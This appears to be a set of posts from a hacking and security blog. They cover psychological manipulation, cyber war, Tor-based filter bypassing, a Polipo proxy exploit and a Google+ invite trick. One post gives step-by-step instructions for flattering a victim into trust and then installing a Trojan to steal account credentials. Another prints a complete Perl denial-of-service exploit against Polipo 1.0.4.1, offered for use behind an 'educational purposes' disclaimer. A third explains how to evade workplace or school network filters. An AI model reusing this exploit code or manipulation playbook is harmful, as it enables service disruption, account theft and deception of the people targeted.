Blog Moved

Xc0re Blog has been shifted to http://xc0re.net/blog . Updates would be reflected on both blog sites for some time , then they would only be updated on the above mentioned blog URL .


Psychological Warfare

Human Beings are stupid by default ! Human Stupidity never fails to amaze any one. We do very very stupid things , unknowingly of-course. This article is about how hackers or any one can tap into the human mind and take advantage of it in every way possible , usually called exploitation. This is either taught or some have this talent by birth for example people like Kevin Mitnick.

Before writing this blog post I just read a tweet on my Twitter Bot that “… do not worry about the Facebook cancellation email” , usually sent by hackers , to fool the innocent Facebook users in giving off their username/password to the hacker. It kept me thinking that why does this happen , why do people fall prey to such scams ! Even if they are technical or not ,they fall for it.Why does this happen?

For an introduction, I would like to say that usually this happens because the hackers know your weaknesses and by you  I mean every body. Hackers exploit these weaknesses to gain username/passwords and other information , usually called Social Engineering ! This talent can be weaponized and used to overthrow governments , start wars , financial gain etc. Once this talent is weaponized and used , it is called Psychological Warfare.

Psychological Warfare is actually mind games on steroids ! The applications and scope of Psychological warfare is broader to an exponential level.  Now I would tell you the process of psychological warfare used by hackers , a shopkeeper , Governments , Military etc .

Exploiting Human Selfishness

Human beings are very selfish ! Once a great man , who is my teacher as well as a very good friend argued that human beings are very selfish ! They do nothing selflessly and I was against the argument and gave many valid points as loving my family or my parents , giving stuff in charity etc so how is it not a selfless act , I don’t get any thing in return. He smiled and said , doing charity helps your conscience to be at peace. You love your parents because it gives you satisfaction. You don’t do any thing that doesn’t give you satisfaction, hence its selfish at some level. Well my point being is that human beings are selfish.  Every one has created his/her world around him/her and they just want to gain any thing and every thing from it.

Coming back to the topic , to how this is exploited. A simple example , every one likes free stuff , a hacker throws a USB flash disk on your door step or in your lawn , one would definitely pick it up and bring it home, well from a hacker’s perspective , any virus lurking in the usb will be executed and the computer would get infected and the usernames and passwords for your facebook , yahoo , hotmail etc would fly off to the hacker. Now in the second example as I mentioned earlier , the current scam for facebook cancellation message in the inbox . Why is everybody clicking on the link and getting hacked? Now here is a thought process that would start in my mind if I didn’t know about this , as soon as I would get this message I would say ” Niaah dude , its so fake ! ” and close the message window. Then after an hour or so I would think , what if the message was legit ! I mean what ever any one is saying , they didn’t get this message , I did!!! My Facebook account would be deleted , and I would be in loss ! The hell with it , I just have to goto the link and get it over with. After that I go onto the link and get hacked happily , but  who cares  atleast I saved my account from cancellation , so what if I got hacked but at least it would not get cancelled.

I hope my dear readers got the Idea !

Exploiting The Human Ego

You must have heard the sentence , ” I am right !! “! Me , Me , Me , I don’t care who you are and what your saying , I am right 100 percent. You must have seen your Bosses , Elder siblings , Teachers  etc , giving these statements. Now what is the best way to turn a no to a yes , in a Boss’s case ? You say : “Sir you are the best boss ever , what ever you say is right but if , though I don’t know much compared to you. Your knowledge is much more , but if you could accept blah blah blah , it would be great. I so want your input in this blah blah ! With out your input this blah blah is nothing. Please accept this !! ” There is a 80 Percent chance , No would change to a Maybe and 60 percent chance that No would change into a YES !!! Every one loves an Ego boost !

Hacking an account using social engineering and this technique.

Phase 1 :

Chat with your victim , for a while , and find a common subject. Once that is done , start the conversation about any controversial thing but never start giving the comments , for example : say .. ” I don’t know what this country is coming to , or what this school is coming to ! ” If the guy is a musician , say something that there aren’t many bands in the school and the whole music scene is getting destroyed and I think your band is the best there is ! The word flattery should come to mind  !  and then you will notice the guy would start giving his comments, because every one has problems , no one is happy with what he has . Just listen to what he says and just say :” Yeh!  man exactly ” etc ..

Phase 2 :

Take his email address , skype etc and him up ! Befriend him to a point where he starts trusting you. Then once done start the social engineering attacks. Install a Trojan onto his pc , and the list goes on !!

See how a little ego boost helped you gain valuable information. The scope of this blog is restricted to the hacker attacks. This can very easily be applied in real world , with real problems.

Intercepting and Messing with the Thought Process

Every one has his own thought process. If you say A in a room of  three people, all three people sitting in the room will start thinking of some thing different. The point is to make them think the same thing as to what you are thinking. This is usually achieved when one doesn’t give time to think and bombards ones own thoughts onto the people listening.

When ever a group of people come into a room , or a classroom , they have their own thoughts . Naturally the human brain is in defensive state and the people in the room do not grasp or accept at first, what the teacher is saying. The key is to get to their level and talk about some thing of interest. Human mind has a vulnerability ! To explain that I would give an example : If two people are sitting in a room and a third person is telling his point of view about A Topic , the other two wont accept at first , but ass soon as he finds a common ground , say C , now they talk about C for 10 minutes. The brain naturally put its guard down , and the weakness is that after that every one would agree on Topic A and also any other Topic !!! So one has to make a common base, the rest is all easy.

The second way to mess with the thought process is not to be that desperate to convince ! Once that happens , if any one listens to what you say , no matter how absurd , will first refute the logic but when they will notice that the argument that you are giving is suggestive but not desperate , they will accept it eventually ! Human mind requires time to process the input.

Exploiting the Lack of Concentration

Every one loves their own thing. For example if one person likes reading love stories , he/she would have zero concentration if they read or are forced to read a sci-fi story. Now this is the thing that the hackers exploit . For example for an English professor , if there is no poetry then its  useless. Now if she gets an inbox message by say the hacker , posing that he is from Facebook etc and the message is so long , with authentic logos and every thing ofcourse  , she would skip every thing and goto the end ,where there would be a link to the hacker’s page and boom , the English professor got , as they say “pwned!”

Lack of concentration is a major factor for these attacks to be so successful.

These were some examples of the Human Weaknesses that are exploited during a Psychological Warfare.  I did not mention how to over throw governments etc because for that I would have to write a whole book ! As this blog is related to Hacking and Security thus I had to stay in scope.


The Cyber War !

Cyber war , a very big word , but some how doesn’t seem so big. Let me first give an introduction to what a Cyber War really is. The introduction is divided into two parts , General perception & Reality !

General Perception :

Most of the people in security field know what cyber war is , the general perception is the perception of a cyber war amongst non technical and non security folks ! In general when ever Cyber is added to any word or any sentence,  the impact that it causes to the the listener’s mind is that “Wow ! what a cool name ! “. It doesn’t matter how critical the sentence or the word is , most people don’t take it seriously and the thought that runs in their minds is “Yeah right, this is kids stuff ! “For example , Cyber Bullying , although the impact in reality is very high but there weren’t any laws against it until recently. People used to think , what the hell cyber space is a joke. Its for children , having fun and messing around.

Similarly if people hear about Cyber War any where , they just don’t take it seriously. In their minds they are like , “Cyber War , huh ? What is that ? What can a Cyber War do to me or my country !? ” , because according to them the definition of a cyber war is just a bunch of hackers who don’t have any social life , attacking web sites of other countries and defacing their webpages and then boasting about it , online or amongst friends.

Then these people watch movies like “Die Hard 4.0” and start thinking about the whole concept as just pure entertainment. Thus destroying the slightest spec of seriousness of the word in their minds.

Reality :

In reality Cyber War is a kind of war that starts in the Cyber Space , followed by air & ground attacks , which are pretty real. As in the current age , where cloud computing is the next best thing. Where next generation network technology is in its adolescent phase , where every thing is controlled through a micro chip, or to simplify it  , every thing is computerized. Nuclear Facilities , Hospitals , Industries , Military defense , Electricity etc are all controlled virtually ! I give the example of the movie “Die Hard 4.0” again , though I am not infatuated with this movie but the concept of Firesale is pretty accurate and as this blog is a reference for the Security people as well as a source of information for non technical people thus giving an example of a movie is better then explaining the whole science ! To sum it up , as every thing is automated and computerized thus attacking the systems on a virtual level and bringing them down and as the country gets crippled , its just a matter of walking and claiming it for oneself .

Ok!  Enough with the introduction now lets make things interesting .  Lets start with Stuxnet!! Stuxnet is a very sophisticated cyber weapon created by the US & Israel  against Iranian nuclear facilities. According to the current press , it caused serious damage to the nuclear plan of Iran. Then the appearance of Duqu Malware which was the successor of Stuxnet. Duqu is quite different from Stuxnet, it has a modular structure like Stuxnet but it isn’t equipped with modules for SCADA systems attack. It is only able to steal information from the host system.In recent years China has come on the maps , as a threat to cyber defense. Google in 2010  blamed china for conducting very sophisticated attacks against the Google’s servers.Recent Anonymous attacks against US as well as other countries is also worth mentioning. Wikileaks is also an important part of whats happening in the cyber world.

As Cyber War is the new trend , thus it is very hard to distinguish between cyber criminals and cyber warriors or cyber soldiers. Cyber Armies are being created with full government backing in many countries. As now Cyber space is considered to be a zone which has the same level of importance as the other zones of potential attacks for example Land , Sea , Air !

A full scale Cyber War resembles a Cold War , where you don’t see much activity as during a normal war but , has the power to break down USSR all over again !!!!


Bypass Online Filter Restriction

Hello again !

Disclaimer: All the material shown on this blog is for educational purposes ! We would not be held responsible for any illegal use of the material by any one !

Usually what happens is that people want to visit a website , which is legit , but some how it is listed in the document given to a naive network administrator and you want to download important stuff from it but what the hell , ITS BLOCKED !!!!!!!!  Your boss , teacher or any person whom you report to , doesn’t want hear stuff about BLOCKED SITES !! Its totally lame to them because they want results and you didn’t deliver. This is a very normal problem faced by many employees , students , etc.

First of all you would have to know a little about “Tunnel” . For that please check out my post about Tunneling because your concept of how tunneling works should be very clear. Today I would tell you how one can bypass these filters.

Tor stands for The Onion Router. This was at first created by the US Naval Research Laboratory a long time ago but then was handed over to the people for commercial use ! Though alot of funding is still coming from the US Govt, and alot of other parties. Which is a pretty good thing because TOR was initially designed for anonymity. The goal was that the users would be anonymous over the internet , thus becoming less of a target for the hackers but back then ” Drive By Malware/Exploits were not in mind or yet discovered.

In this blog I would cover the bypassing of filters so anonymity is not the main focus.Ok  how it works is that first you goto the link and download the Vidalia Bundle . Then once downloaded, install the software and all its components.

After installation run the Vidalia executable. Wait for its icon on the tray of the taskbar, to  the right, to become Green. Once that is done , goto the browser’s network option and add following values in the coinciding variables fields :

Proxy Address : 127.0.0.1

Proxy Port : 8118

Ok now save the settings and get out of the options/settings by clicking on OK !

Now your good to go ! To check whether the proxy is working or not goto : What is my IP (dot) com and see your IP Address. For cross checking whether the proxy is working or not , before adding the proxy settings to your browser goto the above mentioned website and note your IP Address and then compare it with the latter!

Enjoy ! If for instance your ISP or Administrator is smart enough to some how block the tor network, goto the TOR control panel and the click the settings button and then goto the netwok tab, it would be something like this :

If you use a proxy to access the internet , usually which is the case in Universities and Offices so this is the option to give proxy to TOR:

There are a few other techniques you could use to bypass the filters , but this one is by far the best.

Peace.


Polipo 1.0.4.1 Proxy Server Denial Of Service

Polipo is a proxy server that is used with TOR (The onion router) vidalia bundle.If we speak in a very abstract and non technical manner then we can say that Polipo routes user’s browser traffic to the tor network. The user has to just give the port number (8118 in case of TOR).

The software’s download page and the exploit code  is as follows:

Disclaimer: [This code is for Educational Purposes , I would Not be
responsible for any misuse of this code]
# Exploit Title: [POLIPO 1.0.4.1 Denial Of Service]
# Date: [10/05/10]
# Author: [Usman Saeed]
# Software Link:[http://www.pps.jussieu.fr/~jch/software/polipo/]
# Version: [1.0.4.1]
# Tested on: [Windows 7 Home]
# CVE : [if exists]
# Code : [exploit code]

[*] Download Page :http://www.pps.jussieu.fr/~jch/software/polipo/
[*] Attack type : Remote
[*] Patch Status : Unpatched
[*] Description  : By sending a crafted POST/PUT request to the server,
 the proxy server crashes !
[*] Exploitation :

#!/usr/bin/perl
# POLIPO 1.0.4.1 Denial Of Service
# Disclaimer:
# [This code is for Educational Purposes , I would Not be responsible
for any misuse of this code]
# Author: Usman Saeed
# Company: Xc0re Security Research Group
# Website: http://www.xc0re.net
# DATE: [30/09/11]

$host = $ARGV[0];
$PORT = $ARGV[1];

$evil = "PUT / HTTP/1.1\r\n".
"Content-Length:1\r\n\r\n";

use IO::Socket::INET;
if (! defined $ARGV[0])
{
print "+========================================================+\n";
print "+ Program [POLIPO 1.0.4.1 Denial Of Service]             +\n";
print "+ Author [Usman Saeed]                                   +\n";
print "+ Company [Xc0re Security Research Group]                +\n";
print "+ DATE: [30/09/11]                                       +\n";
print "+ Usage :perl sploit.pl webserversip wbsvrport           +\n";
print "+ Disclaimer: [This code is for Educational Purposes ,   +\n";
print "+ I would Not be responsible for any misuse of this code]+\n";
print "+========================================================+\n";

exit;
}

$sock = IO::Socket::INET->new( Proto => "tcp",PeerAddr  => $host ,
PeerPort  => $PORT) || die "Cant connect to $host!";
print "+========================================================+\n";
print "+ Program [POLIPO 1.0.4.1 Denial Of Service]             +\n";
print "+ Author [Usman Saeed]                                   +\n";
print "+ Company [Xc0re Security Research Group]                +\n";
print "+ DATE: [30/09/11]                                       +\n";
print "+ Usage :perl sploit.pl webserversip wbsvrport           +\n";
print "+ Disclaimer: [This code is for Educational Purposes ,   +\n";
print "+ I would Not be responsible for any misuse of this code]+\n";
print "+========================================================+\n";

print "\n";

print "[*] Initializing\n";

sleep(2);

print "[*] Sendin evil Packet Buhahahahaha \n";

send ($sock , $evil , 0);
print "[*] Crashed  \n";
$res = recv($sock,$response,1024,0);
print $response;

exit;

#------------------------------

Gatecrashing the Google+ Launch Party

[ Disclaimer: All the material shown on this website is for educational purposes ! We would not be held responsible for any illegal use of the material by any one ! ]

Google+ the new buzz in town !! I see every one on Facebook , commenting about Google+. What is Google+ ? Well it is a social networking project by Google. It has alot of very nice features. Though its not mature enough but still the limited release is very nice. As it is a limited version so even if you Invite some one , they would go up on the page and it would not let you get in . A message saying that the limit has been exceeded.

Today Mr. Usman Ahmed and Mr. Ali Raza Khuwaja  , friends of mine  who are  Penetration Testers working with me , found a work around for inviting people for sure. The fun thing is that it has a 100% success rate uptil now.

The bug found , basically takes advantage of the Circles feature. If you directly send the invite , their would be a problem but if you goto your Home page and in your update section Write any update and just beneath it is an option for adding a Circle (group) to whom the update would be visible to. Write the email address of the Gmail person  as a Circle and post it.

After a while your friend would receive a mail saying:

<< Update on Google+ >>
[Hyper link to Google+] ==>  View or comment on <<Your Name>> post »
The Google+ project is currently working out all the kinks with a small group of testers. If you’re not able to access Google+, please check again soon.

Just click on the hyperlink and your in.

Peace !!!


Follow

Get every new post delivered to your Inbox.

Join 850 other followers